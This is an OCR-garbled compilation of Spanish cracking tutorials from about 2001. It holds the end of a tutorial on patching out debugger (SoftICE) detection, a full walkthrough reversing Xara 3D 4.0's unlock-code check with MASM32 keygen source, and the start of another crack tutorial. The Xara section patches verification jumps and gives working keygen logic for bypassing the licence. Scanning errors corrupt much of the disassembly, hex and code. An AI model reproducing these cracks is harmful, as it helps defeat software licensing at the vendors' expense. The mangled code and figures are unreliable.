45-50 00 00 00 


hemos dado justo en el blanco, vemos que si encuantra algo bl se pone a 1 (mov bl, 01), si no continua a cero, con cambiar el 1 
por el O (mov bl, 00), ya estaría pasada la protección, así de fácil. Ya sabéis que es lo que hay que hacer para hacer el loader, y 
también para hacer el parche eso ya os lo dejo a vosotros. 


Nota: para los que uséis windows NT, veréis que en esta llamada, no detecta a sice, pero en la siguiente llamada tened cuidado 


3) 


Otra forma de encontrar la protección, una vez que tenemos el programa desempaquetado, sólo tenemos que ir a Wdasm, 
desemsamblarlo, y buscar en las Strings References "WASICE" y "NANTICE" y ya está, aunque no siempre podremos hacer 
esto. 


Finalizando 


Bueno esto ha sido todo por esta vez, espero no haberme equivocado mucho, si encontráis cualquier error, o tenéis alguna pregunta 
no dudéis en decírmelo. Espero que os haya resultado útil este tute. No olvidéis que nuestro objetivo sólo es aprender. Sin 


contar con la diversión que esto supone por supuesto ;-)) 
Un Gran Saludo para: 


PrOfesor X 

SiILVeR STORM 

Txeli 

DeK_OiN 

Act Mago 

RAZIEL, ViPER y LEIRUS 


Al resto de amigos de K-FoR (Hi John) 


e Todo el DREAM TEAM de la Compilación de Tutoriales 2001 CdT2001 :) 


e Saludos a todos los crackers del mundo 
Hasta la próxima... 


«poroto a » 


Mi correo: kuato thortdhotmail.com 


La página de [K-FoR]: http://pagina. de/kfor 
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Programa: 


PROTECCION: 
Objetivo: 
Descripcion: 


Dificultad: 
DOWNLOAD : 


Herramientas: 


CRACKER: 


Karpoff Spanish Tutor 2001 
Xara 3D 4.0 


Código de desbloqueo generado a partir del 
registro 


Hacer un Keygen. 


Programa que produce textos en 3D con efectos de 
luz, color y movimiento. 


Aficionado 


http://www.xara.com/downloads/software/xara3d4n.exe 


Softice, MAsm32 


Caos Reptante FECHA: 03/07/2001 


INTRODUCCION 


Este programa, que a mí me parece que no está nada mal, tiene desde nuestro punto de vista como 
principal característica, la de generar un código a partir de datos del registro. Al darles este código 
junto con nuestro dinero :o( nos dan un código de desbloqueo para evitar que en el fondo de 
nuestros diseños aparezca un mosaico de anagramas del programa, que los estropea 
completamente. Aunque esto me parezca vomitivo, debo reconocer que es una manera eficaz de 
mostrar las posibilidades del programa sin que se pueda obtener nada útil de él. Es realmente 


maquiavélico :o( 


Vamos a frustrar las intenciones del programador, confeccionando un keygen que nos permitirá 
evaluar con calma el programa ;0) 


AL ATAKE 


Me gusta hacer keygens, pero me he encontrado con algún programa que, por ejemplo, de la versión 3.0 a la 3.1, 
cambia el número de registro. Así no merece la pena emplear tiempo en hacer un keygen, cuando la utilidad de este 
puede ser en ocasiones, tan limitada como la de un parche :o( Para animaros a vosotros, y animarme yo, transcribo a 
continuación la opinión de ESTADO+PORCINO: 


¿Merece la pena hacer un Generador? 


La respuesta es depende. Hacer un Generador no es nada sencillo, consume mucho tiempo y habilidades. Es mucho más 
fácil parchear la rutina de verificación para que acepte cualquier cosa. 

Pero las ventajas de crear un Generador son muy importantes, primera y ante todo es que realmente se está cumpliendo 
con la filosofía crack (ingeniería inversa) al comprender y transformar el programa para que se adapte a nuestras 
necesidades. 

Segunda ventaja son los conocimientos que se captan sobre todo a nivel ensamblador y de operaciones aritméticas con 
bits. 

Tercera y no más importante la satisfacción del trabajo artesano, bien hecho. Esa satisfacción que nos hace seguir 
adelante. 

La cuarta ventaja tiene que ver con la historia del Software. Puedes "coleccionar" las protecciones de tu programa 
favorito y ver la evolución de su software. 

Y como quinta, un fin práctico, al final del proceso se obtiene un número de serie válido, lo que te convierte en un 
usuario "legal" y problamente no tengas que crakear la próxima versión. 


No sé si en el futuro seguiré haciendo keygens, o parchearé programas, o me dedicaré a la cria de chinchillas. Bien, 
vamos a lo nuestro. En primer lugar, voy a indicar los saltos que se deberían modificar para parchear el programa. Esto 
no aporta nada nuevo, pero me permitirá hacer alguna consideración que creo de interés. A continuación veremos la 
manera en que se generan los códigos, y finalmente elaboraremos el keygen. En mi último tuto, (el del News Rover) 
acabé bastante harto, y dejé un poco en el aire la explicación de la programación del keygen. Aquí procuraré dejarlo lo 
más claro posible. 


PARCHEADO DEL PROGRAMA 


Lo más práctico es empezar por ver, mediante el File Inspector, Languaje 2000 o similar, si el programa tiene alguna 
característica especial. Aparentemente no es este el caso y pasamos al desensamblado con el W32Dsam. Aquí nos 
encontramos con que el desensamblado se detiene al empezar el código. Probé de cambiar el valor de las secciones con 
el ProcDump sin obtener ningún resultado. Finalmente, recordando una conversación anterior, le expliqué el problema a 
DeK_OIiN, quien me recomendó mirar atentamente la cabecera del programa. Así lo hice con el ProcDump (PE 
Editor/Sections) y vi lo siguiente: 


Sections Editor 


Sections Informations : 


Name [VitualSize | VittualOlfset | RawSize | RawOffset_ | Characteristics | 
text 00081642 00001000 00082000 DOWO1ODO  s000DOZO 
WCODE — 0000ED39  0DOB3000 00007000 00OB3000  E0OOOO20 
sdata 000284400 DOOBADOO 00028000 ODOBADOOD 40000040 
data 00048368 DOOESO0O 00003000 00OES000  CO000040 
sto 0002ED20 0012000 0002F000  DOOEEOOO 40000040 


¿Veis algo extraño? Pues lo hay. En la sección .data el Virtual Size es de 48368, y el Raw Size de 9000. Parece que se 
les ha caído un cuatro :0) Consecuentemente, el Virtual Offset de la sección siguiente es 12E000, mientras que el Raw 


Offset es EEO00. Una vez arreglado esto, (botón derecho sobre .data/ Edit section/Raw Size=00049000, y sobre .rscr 
Edit Section/Raw Offset=0012E000) el W32Dsam desensambla el programa sin ningún problema. Muchas gracias 
DeK :0) Por cierto, me he cargado el programa. Ahora da error al ejecutarse, pero he conseguido desensamblarlo que es 
lo que quería. 

Aquí están las comparaciones a "optimizar" (luego veremos como llegamos hasta aquí): 


:0041F6C1 8378F807 cmp dword ptr [eax-08], 00000007 
:0041F6C5 0F85FF010000 jne 0041F8CA 
:0041F6CF E814CD0500 call 0047C3E8 
:0041F6D4 83C404 add esp, 00000004 
:0041F6D7 85C0 test eax, eax 
:0041F6D9 0F84EB010000 je 0041F8CA 
:0041F6EB E8F8CC0500 call 0047C3E8 
:0041F6F0O 83C404 add esp, 00000004 
:0041F6F3 85C0 test eax, eax 
:0041F6F5 0F84CF010000 je 0041F8CA 
:0041F707 E8DCCCO5SOO call 0047C3E8 
:0041F70C 83C404 add esp, 00000004 
:0041F70F 85C0 test eax, eax 
:0041F711 0F84B3010000 je 0041F8CA 
:0041F723 E8C0CCO500 call 0047C3E8 
:0041F728 83C404 add esp, 00000004 
:0041F72B 85C0 test eax, eax 
:0041F72D 0F8497010000 je 0041F8CA 
:0041F73F E8A4CC0500 call 0047C3E8 
:0041F 744 83C404 add esp, 00000004 
:0041F 747 85C0 test eax, eax 
:0041F749 0F847B010000 je 0041F8CA 
:0041F75B E888CC0500 call 0047C3E8 
:0041F760 83C404 add esp, 00000004 
:0041F763 85C0 test eax, eax 
:0041F765 0F845F010000 je 0041F8CA 
:0041F777 E8S6CCCO50O call 0047C3E8 
:0041F77C 83C404 add esp, 00000004 
:0041F77F 85C0 test eax, eax 
:0041F781 0F8443010000 je 0041F8CA 
:0041F80F 3BC1 cmp eax, ecx 
:0041F811 0F85B3000000 jne 0041F8CA 


En la primera, se comprueba que la longitud del código es de siete caracteres. En las siete siguientes, que se trata de 
letras. Y en la última, que el código es correcto. 

A mi no me gusta (no digo que esté mal, digo que no me gusta) invertir los saltos, prefiero obligar a saltar o impedir el 
salto, según convenga. En este caso, ninguno de los saltos debe producirse, por lo que deberíamos "nopear" el primer y 
el último salto, substituyendo por ejemplo OF 85 B3 00 00 00 por 90 90 90 90 90 90, o por OF 85 00 00 00 00 que envía 
el salto a la línea siguiente. Con los otros siete, se puede hacer lo mismo, o ir a buscar el call, y hacer que al regreso de 
éste, EAX sea igual a uno. Pero lo que en este caso no debe hacerse, es invertir los ocho primeros saltos, porque de 
hacerlo así, en el caso de que se nos ocurriera introducir un código de siete caracteres, o de que alguno de estos 
caracteres fuera una letra, el programa no nos aceptaría el código. 


OBTENCION DEL CODIGO 


Bien, después de divagar, vamos a hacer cosas útiles. En primer lugar, con el Soflce cargado, ejecutamos el 

rograma, y vemos que lo primero que hace es darnos la opción de adquirirlo o de continuar. Le damos a "Purchase" 
, nos aparece una ventana en cuya parte superior aparece un código de nueve letras que no nos interesa y en la parte 
inferior una ventana de texto para introducir el código y el botón de unlock. Vamos a introducir un código, pero 
¿cual? Si previamente hubiéramos mirado en la ayuda del programa el procedimiento para registrarse, (siempre es 
conveniente hacerlo) hubiéramos leído esto: 


Unlocking uses two keys: 
a nine letter Key code (el que aparece en la parte superior) 
a seven letter Unlock code (el que debemos introducir) 


Pues muchas gracias :0D Así que vamos a introducir un código de siete letras "ABCDEFG" que si bien nos costará 
localizar en la memoria, nos permitirá ver el orden en que deben ir las letras con mayor facilidad. Antes de pulsar 
"Unlock software", pulsaremos control+D y una vez en el Softlce, introduciremos bpx hmemcpy. Salta el Slce y 
pulsamos unas siete veces F12 para volver al Xara. 


:004961A0 FF90A0000000 call dword ptr [eax+00000040] llamada 
a HMEMCPY 

:004961A6 8945FC mov dword ptr [ebp-04], eax llegamos 
aquí 


¡Ahora se trata de localizar la cadena "ABCDEFG" en la memoria. Lo haremos mediante la instrucción s 30:00 1 
£fffffff 'ABCDEFG', la cual nos lleva a una cadena de texto que incluye todo el abecedario y que no tiene 
ada que ver con lo que nos interesa. Pulsamos s para seguir buscando y por fin, después de varios intentos, 
legaremos a la buena.(La dirección puede ser parecida a 0ODC47xx). Una vez localizado nuestro código, 
introduciremos la instrucción bpm dirección rw que nos parará el Slce cuando se lea esta posición de 
coo que corresponde a la primera letra de nuestro código. FS para continuar y el Slce se detiene en KERNEL32. 
ulsamos F12 dos veces y de vuelta en el Xara: 


:00499931 FF1528A34B00 Call [KERNEL32!1strlen] 
:00499937 8BOE mov ecx, dword ptr [esi] llegamos 
aquí 


Parece que ha mirado la longitud del código y la ha colocado en EAX. De momento, nada de interés. FS para 
continuar y llegamos a la zona caliente :0) 


:0041F6CB OFBE1O movsx edx, byte ptr [eax] 
:0041F6CE 52 push edx 
:0041F6CF E814CD0500 call 0047C3E8 


En este call, se suma el doble del código ASCII de la primera letra a la dirección de inicio de una tabla. En la 
dirección indicada por esta suma, se hallará un número impar si el código corresponde a una letra mayúscula. A 
continuación, se hace un AND 01 con este número quedando el resultado en EAX. Lógicamente, este resultado será 1 
si el número es impar y O en caso contrario. De vuelta: 


:0041F6D4 83C404 add esp, 00000004 
:0041F6D7 85C0 test eax, eax 
:0041F6D9 0F84EB010000 je 0041F8CA 


:0041F6DF 8B842444010000 mov eax, dword ptr [esp+00000144] 


:0041F6E6 OFBE4801 movsx ecx, byte ptr [eax+01] 
:0041F6EA 51 push ecx 
:0041F6EB E8F8CC0500 call 0047C3E8 


Sigue con las otras seis letras y a continuación empieza el cálculo: 


:0041F787 8BC5 mov eax, ebp 
:0041F789 8BCD mov ecx, ebp 


E EBP se encuentra un número (B466C9E8) que merece toda nuestra atención. Luego veremos de donde ha salido. 
or cierto, cuando registremos el programa :0) este número quedará anotado en el registro. 


:0041F78B D1E8 shr eax, 1 

:0041F78D 2555555555 and eax, 55555555 

:0041F792 81E155555555 and ecx, 55555555 

:0041F798 8D0C48 lea ecx, dword ptr [eax+2*ecx] 
:0041F79B 8B842444010000 mov eax, dword ptr [esp+00000144] 
:0041F7A2 69C915DE7856 imul ecx, 5678DE15 


Va haciendo cálculos con el número misterioso, y el resultado que en mi caso es AA692764, lo guarda en ECX para 
compararlo más adelante y pone en EAX la dirección de nuestro código. 


:0041F7A8 8A5801 mov bl, byte ptr [eax+01] BL=42 
(22 letra) 

:0041F7AB 8A5003 mov dl, byte ptr [eax+03] DL=44 
(4% letra) 

:0041F7AE 885C2432 mov byte ptr [esp+32], bl 

:0041F7B2 8A18 mov bl, byte ptr [eax] BL=41 
(1% letra) 

:0041F7B4 885C2430 mov byte ptr [esp+30], bl 

:0041F7B8 8A5805 mov bl, byte ptr [eax+05] BL=46 
(6% letra) 

:0041F7BB 885C2431 mov byte ptr [esp+31], bl 

:0041F7BF 8A5802 mov bl, byte ptr [eax+02] BL=43 
(3% letra) 

:0041F7C2 885C2433 mov byte ptr [esp+33], bl 

:0041F7C6 8A5806 mov bl, byte ptr [eax+06] BL=47 
(78% letra) 

:0041F7C9 OFBE4004 movsx eax, byte ptr [eax+04] EAX=45 
(5% letra) 

:0041F7CD OFBEF3 movsx esi, bl ESI=47 
:0041F7DO 8D0440 lea eax, dword ptr [|eax+2*eax] 
:0041F7D3 OFBED2 movsx edx, dl EDX=44 
:0041F7D6 8DO04C6 lea eax, dword ptr [esi+8*eax] 


EAX+2*EAX es igual a 3*EAX, si ahora se multiplica EAX por 8, el resultado es igual a 24* el valor original de 
AX (45h), al que se le suma ESI, es decir: 47h. El resultado es 6BFh. (Identifico con la letra "h" los números 
exadecimales, excepto los de las anotaciones en el margen derecho). 


:0041F7D9 OFBE742433 movsx esi, byte ptr [esp+33] ESI=43 
:0041F7DE 8D0440 lea eax, dword ptr [|eax+2*eax] 
:0041F7E1l 8D04C6 lea eax, dword ptr [esi+8*eax] 


Se multiplica 6BFh por 24 y se le suma ESI (43h). El resultado es A22Bh. 


:0041F7E4 OFBE742431 movsx esi, byte ptr [esp+31] ESI=46 
:0041F7E9 8D0440 lea eax, dword ptr [|eax+2*eax] 
:0041F7EC 8D04C6 lea eax, dword ptr [esi+8*eax] 


Se multiplica A22Bh por 24 y se le suma ESI (46h). El resultado es F344Eh. 


:0041F7EF OFBE742430 movsx esi, byte ptr [esp+30] ESI=41 
:0041F7F4 8D0440 lea eax, dword ptr [eax+2*eax] 
:0041F7F7 8DO4C6 lea eax, dword ptr [esi+8*eax] 


Se multiplica F344Eh por 24 y se le suma ESI (41h). El resultado es 16CE791h. 


:0041F7FA 0FBE742432 movsx esi, byte ptr [esp+32] ESI=42 
:0041F7FF 8D0440 lea eax, dword ptr [|eax+2*eax] 
:0041F802 8D04C6 lea eax, dword ptr [esi+8*eax] 


Se multiplica 16CE791h por 24 y se le suma ESI (42h). El resultado es 2235B5DAh. 


:0041F805 8D0440 lea eax, dword ptr [|eax+2*eax] 
:0041F808 8D84C267216BFB lea eax, dword ptr [edx+8*eax-0494DE99] 


Se multiplica 2235B5DAH por 24 y se le suma EDX (44h). Se le resta un número mágico y el resultado es 
30742E1Bh. 


:0041F80F 3BC1 cmp eax, ecx 
:0041F811 0F85B3000000 jne 0041F8CA 


Se comparan el número que habíamos visto antes (AA692764) con este de ahora y naturalmente, el programa nos 
manda a paseo. Pero ya sabemos lo que se hace con el código que hemos introducido. El numero a comparar, es el 
resultado de aplicar la fórmula: 


(105 +*24)4+7*)* 2443") * 24+6*)* 24+1*)* 24 4+2* ) * 24 + 4” - 494DE99h. Aquí, 1*, 2?, etc. significa el 
código ASCII de la 1*, 2* letra etc. 


Creo que la fórmula está clara, pero me temo que lo que sigue, no lo está tanto. 


Podemos empezar por buscar el número más bajo posible. ¿Cuál será? El número correspondiente al código 
"AAAAAAA”. Para ello, aplicaremos la fórmula pero nos detendremos antes de efectuar la última resta: 


(((C41h * 24) +41h)* 24+41h)* 24+41h)*24+41h ) * 24+ 41h ) * 24 + 41h y el resultado es: ¡¡494DE99!! 
Eso quiere decir que el numero correspondiente al código "AAAAAAA” es 0 y que para calcular los números de 
cualquier código es válida la fórmula: 


(05 *24)+7*)*24+3")* 244+6*)*244+1*)* 24 +2") * 24 + 4*. Ahora, 1”, 2”, etc. significa la diferencia 
entre el código ASCII de la 1?, 2* letra etc. y 41h. 


¡Ahora podemos deducir que el código de la 4* letra será el resto de dividir el número guardado en ECX, por 24. ¿Por 
qué? Si llamamos Nl a ((((((5** 24)+7*)*244+3")* 24+6*)*24+1*)* 24 +2* ) * 24, y N2 al número en 
ECX, podemos decir que: N1 + 4? = N2, entonces N1 = N2 - 4” . Sabemos que N1 es múltiplo de 24, por tanto, N2 - 


4” también lo es. Entonces lo que le "sobrará" a N2 para ser divisible por 24 es 4? o sea, la diferencia entre el código 
de la 4* letra y 41h. 


lA partir de ahora, todos los números van a ser hexadecimales y no voy a poner la "h". 


Vamos a probar dividiendo AA692764 por 18 (24 decimal). El resultado es 719B6F9 y el resto es C, que sumado a 
41, nos da 4D, el código de "M" que será la cuarta letra. 
lA continuación, dividimos 719B6F9 por 18. El resultado es 4BBCES y el resto es 1, que sumado a 41, nos da 42, el 
código de "B" que será la segunda letra. 
'A continuación, dividimos 4BBCES5 por 18. El resultado es 327DF y el resto es D, que sumado a 41, nos da 4E, el 
código de "N" que será la primera letra. 
¡A continuación, dividimos 327DF por 18. El resultado es 21A9 y el resto es 7, que sumado a 41, nos da 48, el código 
de "H” que será la sexta letra. 
¡A continuación, dividimos 21A9 por 18. El resultado es 167 y el resto es 1, que sumado a 41, nos da 42, el código de 
"B" que será la tercera letra. 

inalmente, dividimos 167 por 18. El resultado es E y el resto es 17, que sumado a 41, nos da 58, el código de "X" 
ES será la séptima letra. 
Si dividiéramos E por 18, El resultado sería O y el resto E, que sumado a 41, nos da 4F, el código de "O" que será la 
caen letra. 

espués de todo este cipostio, utilizando la cuenta de la vieja, hemos descubierto el código para mi instalación ;0) 
que es: " NBBMOHX". Vosotros ya os arreglaréis con la vuestra :0D 


Si a estas alturas, queda alguien leyendo :0) le interesará saber de donde sale el número misterioso que habíamos 
visto antes en EBP (B466C9E8). Para ello, es necesario buscar el momento en que se pone este valor en el registro. 
No sé si hay un sistema mejor, lo que hice fue poner breakpoints cada vez más atrás, hasta que lo pillé :0) 


:0041EE65 8B54244C mov edx, dword ptr [esp+4C] 


Se pone en EDX un número extraño, pero que después de ver como va la cosa, se descubre que es el valor de 
FirstinstallDateTime en HKEY_LOCAL_MACHINE Software WMicrosof4 Windows WCurrentVersion. Por cierto, para 
Windows NT y 2000, la clave Windows será Windows NT, pero no existe FirstInstallDateTime, por lo tanto, este 
keygen sólo valdrá para Windows 9x y Me. De todos modos, creo que al que tenga NT ó 2000 no le costará mucho 
hacer que el keygen valga para todos los sistemas. 


:0041EE69 33C0 xor eax, eax 
:0041EE6B 8DAA5E40D991 lea ebp, dword ptr [edx+91D9405E] 


* Referenced by a (U)nconditional or (C)onditional Jump at Address: 
| :0041EE90 (C) 


:0041EE71 8B8C0408020000 mov ecx, dword ptr [esp+eax+00000208] 


'Aquí se descubrió el pastel cuando reconocí los nombres de usuario y organización que hay en el registro. Se ponen 
en ECX las cuatro primeras letras de RegisteredOrganization. 


:0041EE78 8B9C0408030000 mov ebx, dword ptr [esp+eax+00000308] 


[Y aquí, en EBX las cuatro primeras de RegisteredOwner. 


:0041EE7F 03CD add ecx, ebp 
:0041EE81 83C004 add eax, 00000004 
:0041£EE84 C1C10D rol ecx, 0D 
:0041EE87 03CB add ecx, ebx 
:0041EE89 C1C104 rol ecx, 04 
:0041EE8C 3BC6 cmp eax, esi 
:0041EE8E 8BE9 mov ebp, ecx 
:0041EE90 7CDF j1 0041EE71 


Este proceso se repite 64 veces, al cabo de las cuales tenemos en EBP el valor B466C9E8. 
Bueno, ya sabemos como se genera el código. Ahora trataremos de generarlo nosotros :0) 


PROGRAMACION DELKEYGEN 


Tal como he dicho anteriormente, voy a procurar explicar el proceso del keygen con detalle. De todos modos, sólo 
voy a hacerlo con lo relativo a este programa concreto. Las explicaciones sobre cuestiones generales, las podéis 
encontrar en: "Como Craquear con Ensamblador para Win32" de Mr. Crimson. (Creo haberlo obtenido en 
http://www .multimania.com/mrcrimson/private/MrCrimson1.zip)Y es que yo podría repetir sus explicaciones, pero 


siempre es mejor beber de las fuentes originales :0) Además, vale la pena leerlo o, para ser más exactos, me parece de 
lectura obligada. En primer lugar, el archivo de recursos rsrc.rc: 


ftinclude "Amasm32lincludelresource.h" 


define IDD_DIALOG 1000 
Hkdefine IDC_SERIAL 1001 
Hkdefine IDC_GEN 1002 
Hkdefine IDC_EXIT 1003 
fdefine IDC_INFO 1004 
Hkdefine IDC_STATIC -1 


keygen ICON keygen.ico 

IDD_DIALOG DIALOG 100,100,109,50 

STYLE WS_CAPTION | DS_CENTER | WS_SYSMENU |WS_MINIMIZEBOX 
CAPTION "Xara 3D 4.0" 


FONT 10, "MS Sans Serif" 


BEGIN 
LTEXT "Código de desbloqueo", IDC_STATIC,8,5,36,18 
EDITTEXT IDC_SERIAL, 47,8,54,12,ES_READONLY ES_CENTER 
PUSHBUTTON "Generar", IDC_GEN,8,30,29,12 
PUSHBUTTON "Exit", IDC_EXIT,40,30,29,12 
PUSHBUTTON "Info", IDC_INFO,72,30,29,12 

END 


No hay mucho que contar: Una etiqueta de texto, una ventana de texto, y tres botones. De todo ello, indicamos las 
coordenadas y las medidas. 
¡Ahora pondremos el código en el archivo xara.asm: 


.386 
.model flat,stdcall 
option casemap:none 


include c:imasm32lincludeYwindows.inc 
include c:imasm32Xincludeluser32.inc 

include c:imasm32lincludeladvapi32.inc 
include c:imasm32lincludelkernel32.inc 


includelib c:imasm321libluser32.lib 
includelib c:imasm3211libladvapi32.lib 
includelib c:imasm321l1iblkernel32.lib 


Las librerías que incluimos. Por ejemplo advapi32 incluye las definiciones de las APIs que utilizamos aquí, relativas 
al registro. 


. const 

IDD_DIALOG EQU 1000 
IDC_SERIAL EQU 1001 
IDC_GEN EQU 1002 
IDC_EXIT EQU 1003 
IDC_INFO EQU 1004 


D1lgFunc PROTO :DWORD, :DWORD, :DWORD, : DWORD 
Operacion PROTO 


. data 

Icono db "keygen",0 

Iconimage db "keygen",0 

error db "¡Fallo en registro!",0 

txtl db "1% —- Este keygen sólo es válido para Windows 9x y Me 
a ES MOS A ON 


"2% — Los datos para generar el código de desbloqueo, se 
toman ",X 

"del registro. Si se instala de nuevo Windows, o se cambia 
algún ",M 

"dato de los que emplea el programa, se deberá obtener un 
nuevo ",X 

"número de registro, como ya se encargará de indicarnos el 
Xara 3D.",13,10,13,10,1 

"Saludos de CaoS ReptantE :0)",0 


txt2 db "Información de interés",0 
hInstance dd 0 

hIcon dd 0 

hWnd dd 0 

largo do 2 dup(0),0 

codigo do 7 dup (0),0 

owner db 256 dup (0),0 

ownertxt db "RegisteredOwner",0 

organ db 256 dup (0),0 

organtxt db "RegisteredOrganization",0 
fidt db 4 dup (0),0 

fidttxt db "FirstIinstallDateTime",0 
clave db "SoftwarelMicrosoftYWWindowsYCurrentVersion",0 
handle dd ? 


longitud db 2 dup(0),0 


Las variables que vamos a utilizar. En handle, ponemos interrogante porque es un valor que el programa va a sacar 
del registro y desconocemos su longitud. 


. code 


start: 


invoke GetModuleHandle,NULL 

mov hInstance,eax 

invoke DialogBoxParam,hInstance, IDD_DIALOG, NULL, ADDR 
D1lgFunc, NULL 

invoke ExitProcess,NULL 


Dl1lgFunc proc hDl1g:DWORD, uMsg: DWORD, wParam:DWORD, 1lParam:DWORD 
.1f uMsg==WM_INITDIALOG 
mov eax,hDlg 
mov hWnd, eax 
invoke LoadIcon,hInstance,ADDR Icono 
mov hIcon,eax 
invoke SendMessage, hDlg, WM_SETICON, 1,hIcon 


Creación de la ventana. 


.elseif uMsg==WM_CLOSE 
invoke EndDialog,hDlg,NULL 


¿Cerramos desde el botoncito en el lado superior derecho de la ventana? 


.elseif uMsg==WM_COMMAND 
mov eax,wParam 
mov edx,eax 
shr edx,16 


¿Le hemos dado a un botón? Vamos a ver a cual. 


.1f dx==BN_CLICKED 

.1f ax==IDC_EXIT 

invoke SendMessage,hDlg,WM_CLOSE,0,0 

.elseif ax==IDC_INFO 

invoke MessageBox,hDl1g,ADDR txt1,ADDR 
txt2,MB_ICONINFORMATION 
.elseif ax==IDC_GEN 
invoke Operacion 
.«1f eax==ERROR_SUCCESS 

invoke SetD1gltemText,hDlg,IDC_SERIAL,ADDR codigo 
.elseif 

invoke SetD1gltemText,hDlg, IDC_SERIAL,ADDR error 
.endif 
ret 


Si le hemos dado al de salir, pues a la calle. Si le hemos dado al de Info, nos aparece la Message Box con el texto que 
hemos definido. Si le hemos dado al de generar, llama a Operacion y al regreso si ha habido un error nos lo indica, y 
si todo ha ido bien, nos coloca el código obtenido en la ventana de texto. 


.endif 
.endif 
.endif 
ret 


Dl1lgFunc endp 


¡Aquí se va a calcular el código: 


Operacion proc 


invoke RegOpenKeyExA, HKEY_LOCAL MACHINE,ADDR clave,NULL, 
KEY_QUERY_VALUE,ADDR handle 
.1f eax!=ERROR_SUCCESS 
ret 
.endif 


Obtenemos el handle o identificador de la clave HKLM (Fijaos que es la variable en la que hemos puesto 
interrogante). Si no lo encuentra (mal asunto), error y a la calle. El valor NULL es obligado. La constante 
KKEY_QUERY_VALUE es la máscara de acceso a la clave, que indica lo que nos permite hacer con ella. Para lo que 
queremos, esta nos vale. 


mov ebx, Offset longitud 
mov [ebx], word ptr 256 
invoke RegQueryValueExA, handle, ADDR ownertxt, NULL, REG_NONE, ADDR 
owner,ADDR longitud 
.1f eax!=ERROR_SUCCESS 
ret 
.endif 


¡A quí, con el handle obtenido antes, obtiene el valor de RegisteredOwner. En longitud, le indicamos la longitud de los 
datos a leer, pero nos devuelve el número de bytes leídos realmente (hasta encontrar 0). Por esta razón, debemos 
volver a poner en longitud los 256 bytes. Si aquí nos da error, es posible que tengamos instalado Windows NT o 
2000 (no se me ocurre otra razón). 


mov ebx, Offset longitud 
mov [ebx], word ptr 256 
invoke RegQueryValueExA, handle, ADDR organtxt,NULL,REG_NONE, ADDR 
organ,ADDR longitud 
.1f eax!=ERROR_SUCCESS 
ret 
.endif 


Lo mismo, pero para RegisteredOrganization. 


mov ebx, Offset longitud 
mov [ebx], word ptr 4 
invoke RegQueryValueExA, handle,ADDR fidttxt,NULL,REG_NONE, ADDR 
fidt,ADDR longitud 
.1f eax!=ERROR_SUCCESS 
ret 
.endif 


Lo mismo, pero para FirstInstallDateTime. 


invoke RegCloseKey, HKEY_LOCAL_ MACHINE 


mov esi, 100h 
pushad 


Tuve problemas porque el programa se colgaba. Después de utilizar el Softlce como debugger :0) pensé que sería una 
buena idea guardar todos los registros para recuperarlos después. Se terminaron los problemas. 


El código que sigue, es equivalente al del programa entre las direcciones 41EE65 y 41EE90. 


mov edx, Offset fidt 

mov edx, dword ptr [edx] 

xor eax, eax 

lea ebp, dword ptr [edx+91D9405Eh] 
buclel: mov ecx, Offset organ 

mov ecx, dword ptr [ecx+eax] 

mov ebx, Offset owner 

mov ebx, dword ptr [ebx+eax] 

add ecx, ebp 

add eax, 01 

rol ecx, 0ODh 

add ecx, ebx 

rol ecx, 04 

cmp eax, esi 

mov ebp, ecx 

31 buclel 


Este otro código, es equivalente al del programa entre las direcciones 41F787 y 41F7A2. 


mov eax, ebp 

mov ecx, ebp 

shr eax, 1 

and eax, >D5555555h 

aña. €E6X, 'DIODDDDDODNA 

lea ecx, dword ptr [eax+2*ecx] 
imul ecx, 5678DE15h 


¡Ahora sólo es cuestión de obtener las letras y ponerlas en el orden correcto. 


xor esi, esi 

mov edi, Offset codigo 
mov eaXxX, ecx 

mov ecx, 24 

for tabla, <3,1,0,5,2,06,4> 


Esta instrucción for, ejecuta las instrucciones que hay hasta endm tantas veces como parámetros (<p1,p2,...>) tenga, 
dándole a la variable tabla los valores de cada parámetro. O sea, como un bucle for-next, pero con los valores de la 
variable definibles. En este caso, los parámetros representan el número que hay que sumar a la dirección de inicio del 
código para situar las letras en el orden correcto (3 para la cuarta letra, 1 para la segunda, O para la primera, etc.) 


xor edx, edx 
div ecx 


Esta instrucción, divide el contenido de los registros EDX : EAX por ECX dejando el cociente en EAX y el resto en 
EDX. Previamente, hemos puesto a cero el registro EDX. 


add edx, 41h 
mov [edi+tabla], dl 


Le sumamos al resto, 41h para convertirlo en letra y lo ponemos en su lugar, definido por la variable tabla, o sea los 


parámetros de la instrucción for. Así, como he dicho antes, se colocará primero la cuarta letra, luego la segunda, la 
primera, la quinta, etc. 


endm 


popad 
ret 


Recuperamos los registros y volvemos. 


Operacion endp 
end start 


Ensamblamos con el MAsm32 y he aquí el resultado: 


MM Xara 3D 4.0 


Código de 
desbleques) NBBMOR 
Exit | Into | 


That's all Folks. 


FINAL 


¡Debo recordaros como siempre, que si pensáis utilizar regularmente el programa, debéis plantearos invertir una parte 
considerable de esos dineros que malgastáis tan alegremente en vicios -seguramente algunos de ellos inconfesables- en 
proporcionar una vejez tranquila y sin sobresaltos al programador ;0) 


Para finalizar, quiero mandar un saludo a Act Mago, buen amigo y excelente persona. También quiero saludar muy 
cordialmente a DeK_bad_boy_OIiN :0) Por último, debo expresar mi gratitud al Profesor_X por sus recopilaciones y a 
Karpoff por su página. Tal vez estamos acostumbrados a tomar de la Red lo que necesitamos, sin pensar en que esto sólo es 
posible gracias al esfuerzo desinteresado de personas como ellos. La verdad, si no fuera por estas personas, las cosas serían 
imás difíciles :0) 


Para consultas relativas a mis tutos, mi dirección de e-mail es: caos_reptante hotmail.com 
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Acceso a solo 100 niveles, de un total de 131071 etc. 
Nags-screen, limite de niveles 
http 20% 
Y Hex WorkShop 2.20b005 
Herramientas: P* Softl CE 4.0 
PF KW32dasm 8.93 


OS AENA HE ZETA 


INTRODUCCION 


ola, estoy con el gusto de poder mostrarles la forma de como lleve a cabo el analisis de esta aplicacion. 


Antes que nada dejenme comentarles que esta aplicacion, antes realizada para MSDOS, se tenia acceso a cualquier nivel, sin 
embargo en 'guidous', solo a 100 niveles; es bueno y entretenido, si saben a que me refiero y ademas estructuralmente esta muy 
bien realizado, como podran observar mas adelante, no es como algunas aplicaciones donde en tres renglones se decide la suerte 
:0O406AAE TEST AL, AL 

:00406ABO JNE 00406ACA 


ossible StringData Ref from Data Obj --> "Invalid Registration Information" 


:00406AB2 PUSH 0046088C 
:00406AB7 


ossible StringData Ref from Data Obj --> "Thank you for registering your copy of 'Aplicacion" 


:00406ACA PUSH 00460838 
:00406ACF 


y eso lo hace mas interesante 


